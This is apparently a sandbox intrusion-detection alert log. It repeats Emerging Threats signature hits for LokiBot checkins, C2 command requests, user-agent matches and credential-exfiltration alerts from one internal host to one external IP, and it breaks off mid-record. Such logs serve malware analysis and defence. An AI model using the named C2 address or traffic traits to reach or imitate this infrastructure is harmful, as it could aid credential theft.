Timestamp:	04/03/24-06:38:09.892413
SID:	2024313
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:23.522239
SID:	2025381
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.265047
SID:	2825766
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.987496
SID:	2825766
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:06.650555
SID:	2825766
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:45.205065
SID:	2024318
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:48.477935
SID:	2024318
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:33.600213
SID:	2024313
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:45.205065
SID:	2024313
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:33.600213
SID:	2024318
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.122430
SID:	2025381
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.219175
SID:	2025381
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.152524
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.224947
SID:	2025381
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.163901
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.152524
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:21.763703
SID:	2021641
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.914570
SID:	2025381
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:44.645218
SID:	2024313
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:44.645218
SID:	2024318
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:56.609631
SID:	2021641
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:07.360242
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:26.534492
SID:	2021641
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:07.360242
SID:	2024318
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:13.658001
SID:	2825766
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:45.335995
SID:	2024313
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:08.198877
SID:	2825766
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:35.672062
SID:	2825766
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:35.452745
SID:	2825766
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.151380
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:45.335995
SID:	2024318
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:42.314099
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.844436
SID:	2825766
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:57.435447
SID:	2825766
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.904801
SID:	2024313
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:53.598973
SID:	2024318
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.972593
SID:	2021641
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:53.598973
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:52.638175
SID:	2025381
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.987496
SID:	2021641
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.210551
SID:	2021641
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.904801
SID:	2024318
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.093731
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.122189
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.009985
SID:	2021641
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.030663
SID:	2024312
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.125041
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:36.358340
SID:	2024318
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.732709
SID:	2025381
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.122189
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.163901
SID:	2825766
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:10.724952
SID:	2021641
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:36.358340
SID:	2024313
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.030663
SID:	2024317
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:10.724952
SID:	2825766
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.179954
SID:	2024313
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:19.372255
SID:	2024313
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:31.437871
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:28.593679
SID:	2825766
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:19.372255
SID:	2024318
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:42.416972
SID:	2024318
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.957176
SID:	2025381
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:31.437871
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:42.416972
SID:	2024313
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:30.670976
SID:	2025381
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.179954
SID:	2024318
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:16.574818
SID:	2025381
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:50.437190
SID:	2021641
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:29.787077
SID:	2825766
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:02.546391
SID:	2025381
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.218805
SID:	2024313
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.278543
SID:	2024318
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.958519
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.198908
SID:	2825766
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.218805
SID:	2024318
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.278543
SID:	2024313
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.256073
SID:	2021641
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:50.546988
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.947017
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:39.111241
SID:	2825766
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:00.331066
SID:	2025381
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.764699
SID:	2825766
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.043826
SID:	2825766
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:50.546988
SID:	2825766
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.911562
SID:	2825766
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:39.111241
SID:	2021641
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.952090
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:29.787077
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.958519
SID:	2825766
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.015339
SID:	2024313
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.269664
SID:	2024318
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.269664
SID:	2024313
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.748494
SID:	2024313
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.015339
SID:	2024318
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:40.804238
SID:	2025381
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.748494
SID:	2024318
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.952090
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.844436
SID:	2021641
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.126318
SID:	2025381
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:50.437190
SID:	2825766
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.972593
SID:	2825766
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:45.205065
SID:	2025381
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.719182
SID:	2024313
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:53.598973
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.796602
SID:	2024318
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:23.522239
SID:	2021641
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:14.340654
SID:	2025381
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.122430
SID:	2024313
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.719182
SID:	2024318
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.122430
SID:	2024318
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.198908
SID:	2021641
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:21.763703
SID:	2825766
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:33.600213
SID:	2025381
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:52.772037
SID:	2825766
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.256073
SID:	2025381
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.796602
SID:	2024313
Source Port:	49778
Destination Port:	80
